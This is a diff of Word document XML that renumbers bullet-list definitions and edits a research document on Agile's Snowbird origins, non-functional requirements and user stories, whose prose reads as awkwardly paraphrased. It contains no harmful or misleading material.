+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="31" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="63C54FF5"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4330E89A"/>
@@ -9084,7 +10870,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="32" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="660F1080"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="62D27636"/>
@@ -9197,7 +10983,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="33" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="671B4409"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="7CA89C3A"/>
@@ -9310,7 +11096,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="34" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6747615E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="30746258"/>
@@ -9423,7 +11209,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="35" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6A410F31"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E37EF7DE"/>
@@ -9536,7 +11322,120 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="36" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="6B491103"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="9DE6260C"/>
+    <w:lvl w:ilvl="0" w:tplc="04130001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="37" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6BD2345E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6C206E7E"/>
@@ -9649,7 +11548,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="31" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="38" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="737E09DB"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="7DAEFEF4"/>
@@ -9735,7 +11634,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="32" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="39" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="76A57279"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E070BC88"/>
@@ -9848,7 +11747,120 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="33" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="40" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="7D700B55"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="E92CEA62"/>
+    <w:lvl w:ilvl="0" w:tplc="04130001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="41" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7D725A08"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="7B12F6D2"/>
@@ -9962,106 +11974,130 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="733432084">
+    <w:abstractNumId w:val="26"/>
+  </w:num>
+  <w:num w:numId="2" w16cid:durableId="1767655568">
+    <w:abstractNumId w:val="39"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="262031728">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="4" w16cid:durableId="2029208876">
+    <w:abstractNumId w:val="38"/>
+  </w:num>
+  <w:num w:numId="5" w16cid:durableId="1587032885">
+    <w:abstractNumId w:val="18"/>
+  </w:num>
+  <w:num w:numId="6" w16cid:durableId="385374220">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="7" w16cid:durableId="1942300162">
+    <w:abstractNumId w:val="28"/>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="5526727">
+    <w:abstractNumId w:val="15"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="675763778">
+    <w:abstractNumId w:val="29"/>
+  </w:num>
+  <w:num w:numId="10" w16cid:durableId="1583294197">
     <w:abstractNumId w:val="22"/>
   </w:num>
-  <w:num w:numId="2" w16cid:durableId="1767655568">
-    <w:abstractNumId w:val="32"/>
+  <w:num w:numId="11" w16cid:durableId="771122212">
+    <w:abstractNumId w:val="41"/>
   </w:num>
-  <w:num w:numId="3" w16cid:durableId="262031728">
-    <w:abstractNumId w:val="8"/>
+  <w:num w:numId="12" w16cid:durableId="868299384">
+    <w:abstractNumId w:val="24"/>
   </w:num>
-  <w:num w:numId="4" w16cid:durableId="2029208876">
-    <w:abstractNumId w:val="31"/>
-  </w:num>
-  <w:num w:numId="5" w16cid:durableId="1587032885">
-    <w:abstractNumId w:val="16"/>
-  </w:num>
-  <w:num w:numId="6" w16cid:durableId="385374220">
-    <w:abstractNumId w:val="4"/>
-  </w:num>
-  <w:num w:numId="7" w16cid:durableId="1942300162">
-    <w:abstractNumId w:val="23"/>
-  </w:num>
-  <w:num w:numId="8" w16cid:durableId="5526727">
+  <w:num w:numId="13" w16cid:durableId="1195725970">
     <w:abstractNumId w:val="13"/>
   </w:num>
-  <w:num w:numId="9" w16cid:durableId="675763778">
-    <w:abstractNumId w:val="24"/>
-  </w:num>
-  <w:num w:numId="10" w16cid:durableId="1583294197">
-    <w:abstractNumId w:val="20"/>
-  </w:num>
-  <w:num w:numId="11" w16cid:durableId="771122212">
-    <w:abstractNumId w:val="33"/>
-  </w:num>
-  <w:num w:numId="12" w16cid:durableId="868299384">
-    <w:abstractNumId w:val="21"/>
-  </w:num>
-  <w:num w:numId="13" w16cid:durableId="1195725970">
-    <w:abstractNumId w:val="11"/>
-  </w:num>
   <w:num w:numId="14" w16cid:durableId="1290549567">
-    <w:abstractNumId w:val="28"/>
+    <w:abstractNumId w:val="34"/>
   </w:num>
   <w:num w:numId="15" w16cid:durableId="543031495">
-    <w:abstractNumId w:val="2"/>
+    <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="16" w16cid:durableId="1328437143">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="17" w16cid:durableId="609631976">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="18" w16cid:durableId="1001083117">
-    <w:abstractNumId w:val="26"/>
+    <w:abstractNumId w:val="32"/>
   </w:num>
   <w:num w:numId="19" w16cid:durableId="1857380882">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="20" w16cid:durableId="1625892231">
-    <w:abstractNumId w:val="27"/>
+    <w:abstractNumId w:val="33"/>
   </w:num>
   <w:num w:numId="21" w16cid:durableId="546718483">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="22" w16cid:durableId="27223884">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="23" w16cid:durableId="1108891116">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="24" w16cid:durableId="1610042418">
+    <w:abstractNumId w:val="35"/>
+  </w:num>
+  <w:num w:numId="25" w16cid:durableId="245843674">
+    <w:abstractNumId w:val="31"/>
+  </w:num>
+  <w:num w:numId="26" w16cid:durableId="1209076507">
+    <w:abstractNumId w:val="17"/>
+  </w:num>
+  <w:num w:numId="27" w16cid:durableId="1631477746">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="28" w16cid:durableId="1152210552">
+    <w:abstractNumId w:val="21"/>
+  </w:num>
+  <w:num w:numId="29" w16cid:durableId="137040934">
+    <w:abstractNumId w:val="14"/>
+  </w:num>
+  <w:num w:numId="30" w16cid:durableId="719936676">
+    <w:abstractNumId w:val="19"/>
+  </w:num>
+  <w:num w:numId="31" w16cid:durableId="481654881">
+    <w:abstractNumId w:val="37"/>
+  </w:num>
+  <w:num w:numId="32" w16cid:durableId="1286541447">
+    <w:abstractNumId w:val="20"/>
+  </w:num>
+  <w:num w:numId="33" w16cid:durableId="689186181">
+    <w:abstractNumId w:val="16"/>
+  </w:num>
+  <w:num w:numId="34" w16cid:durableId="1286502848">
     <w:abstractNumId w:val="7"/>
   </w:num>
-  <w:num w:numId="24" w16cid:durableId="1610042418">
-    <w:abstractNumId w:val="29"/>
+  <w:num w:numId="35" w16cid:durableId="1630355062">
+    <w:abstractNumId w:val="40"/>
   </w:num>
-  <w:num w:numId="25" w16cid:durableId="245843674">
+  <w:num w:numId="36" w16cid:durableId="1829438022">
+    <w:abstractNumId w:val="27"/>
+  </w:num>
+  <w:num w:numId="37" w16cid:durableId="1362901995">
+    <w:abstractNumId w:val="36"/>
+  </w:num>
+  <w:num w:numId="38" w16cid:durableId="295721248">
+    <w:abstractNumId w:val="23"/>
+  </w:num>
+  <w:num w:numId="39" w16cid:durableId="725110412">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="40" w16cid:durableId="711807216">
     <w:abstractNumId w:val="25"/>
   </w:num>
-  <w:num w:numId="26" w16cid:durableId="1209076507">
-    <w:abstractNumId w:val="15"/>
-  </w:num>
-  <w:num w:numId="27" w16cid:durableId="1631477746">
-    <w:abstractNumId w:val="3"/>
-  </w:num>
-  <w:num w:numId="28" w16cid:durableId="1152210552">
-    <w:abstractNumId w:val="19"/>
-  </w:num>
-  <w:num w:numId="29" w16cid:durableId="137040934">
+  <w:num w:numId="41" w16cid:durableId="1581791839">
     <w:abstractNumId w:val="12"/>
   </w:num>
-  <w:num w:numId="30" w16cid:durableId="719936676">
-    <w:abstractNumId w:val="17"/>
-  </w:num>
-  <w:num w:numId="31" w16cid:durableId="481654881">
+  <w:num w:numId="42" w16cid:durableId="344744721">
     <w:abstractNumId w:val="30"/>
-  </w:num>
-  <w:num w:numId="32" w16cid:durableId="1286541447">
-    <w:abstractNumId w:val="18"/>
-  </w:num>
-  <w:num w:numId="33" w16cid:durableId="689186181">
-    <w:abstractNumId w:val="14"/>
-  </w:num>
-  <w:num w:numId="34" w16cid:durableId="1286502848">
-    <w:abstractNumId w:val="6"/>
   </w:num>
 </w:numbering>
 </file>

--- a/Documentation/Research document.docx
+++ b/Documentation/Research document.docx
@@ -604,11 +604,9 @@
           <w:pPr>
             <w:pStyle w:val="Kopvaninhoudsopgave"/>
           </w:pPr>
-          <w:proofErr w:type="spellStart"/>
           <w:r>
-            <w:t>Inhoudsopgave</w:t>
+            <w:t>Table of content</w:t>
           </w:r>
-          <w:proofErr w:type="spellEnd"/>
         </w:p>
         <w:p>
           <w:pPr>
@@ -6138,13 +6136,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">In </w:t>
-      </w:r>
-      <w:r>
-        <w:t>mid-2001</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, against the setting of the </w:t>
+        <w:t xml:space="preserve">In mid-2001, against the setting of the </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -6152,25 +6144,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> Mountains in </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Snowbird</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, Utah, US, 17 individuals accumulated to examine the eventual fate of programming advancement. The issue, they concurred, was that organizations were so </w:t>
-      </w:r>
-      <w:r>
-        <w:t>centred</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> around unnecessarily arranging and recording their product advancement cycles that they were neglecting to focus on what truly made a difference: fulfilling their clients. Organizations might have promoted corporate qualities, for example, "greatness" and "trustworthiness," however these qualities did essentially nothing to assist with directing individuals in the correct heading, particularly programming designers. That expected to change. A large number of the </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Snowbird</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> 17 previously had thoughts regarding how to introduce the new period of programming improvement. The outing to the mountains was their opportunity to examine this inside and out.</w:t>
+        <w:t xml:space="preserve"> Mountains in Snowbird, Utah, US, 17 individuals accumulated to examine the eventual fate of programming advancement. The issue, they concurred, was that organizations were so centred around unnecessarily arranging and recording their product advancement cycles that they were neglecting to focus on what truly made a difference: fulfilling their clients. Organizations might have promoted corporate qualities, for example, "greatness" and "trustworthiness," however these qualities did essentially nothing to assist with directing individuals in the correct heading, particularly programming designers. That expected to change. A large number of the Snowbird 17 previously had thoughts regarding how to introduce the new period of programming improvement. The outing to the mountains was their opportunity to examine this inside and out.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6491,125 +6465,89 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Non-</w:t>
-      </w:r>
-      <w:r>
-        <w:t>functional</w:t>
+        <w:t>Non-functional requirement characterize how well an answer needs to perform. Otherwise called quality credits, non-functional requirements depict the overall qualities of an item or framework. They depict how it should act and lay out requirements on its usefulness.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Non-functional requirements are generally founded on something you can measure. Like convenience, security, unwavering quality and performance.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="24" w:name="_Toc116304447"/>
+      <w:r>
+        <w:t>User stories</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="24"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>User</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> stories will assist with communicating prerequisites according to the viewpoint of an end client. Distinguishing </w:t>
+      </w:r>
+      <w:r>
+        <w:t>user</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> stories toward the start of an undertaking can assist with joining individuals survey which highlights are the most significant and foster items or administrations that address the issues of the individual getting them. They can likewise assist with joining individuals separate explicit item includes into more modest and more reasonable undertakings.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>requirement</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> characterize how well an answer needs to perform. Otherwise called quality credits, non-</w:t>
-      </w:r>
-      <w:r>
-        <w:t>functional requirements</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> depict the overall qualities of an item or framework. They depict how it should act and lay out requirements on its usefulness.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Non-</w:t>
-      </w:r>
-      <w:r>
-        <w:t>functional requirements</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> are generally founded on something you can </w:t>
-      </w:r>
-      <w:r>
-        <w:t>measure</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">. Like convenience, security, unwavering quality and </w:t>
-      </w:r>
-      <w:r>
-        <w:t>performance</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t>Example:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>As a user, I would like to receive an email after registration so I can confirm my email address.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>As a customer service representative, I need to improve our customer response time so we can retain customers.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>As an investor, I need to see a daily summary of my investment accounts so I can focus on which one needs my immediate attention.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>These user stories clearly define what features they may want and why. By identifying users' needs with user stories, teams can focus on producing higher-quality products and services.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="24" w:name="_Toc116304447"/>
-      <w:r>
-        <w:t>User stories</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="24"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>User</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> stories will assist with communicating prerequisites according to the viewpoint of an end client. Distinguishing </w:t>
-      </w:r>
-      <w:r>
-        <w:t>user</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> stories toward the start of an undertaking can assist with joining individuals survey which highlights are the most significant and foster items or administrations that address the issues of the individual getting them. They can likewise assist with joining individuals separate explicit item includes into more modest and more reasonable undertakings.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Example:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="30"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>As a user, I would like to receive an email after registration so I can confirm my email address.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="30"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>As a customer service representative, I need to improve our customer response time so we can retain customers.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="30"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>As an investor, I need to see a daily summary of my investment accounts so I can focus on which one needs my immediate attention.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
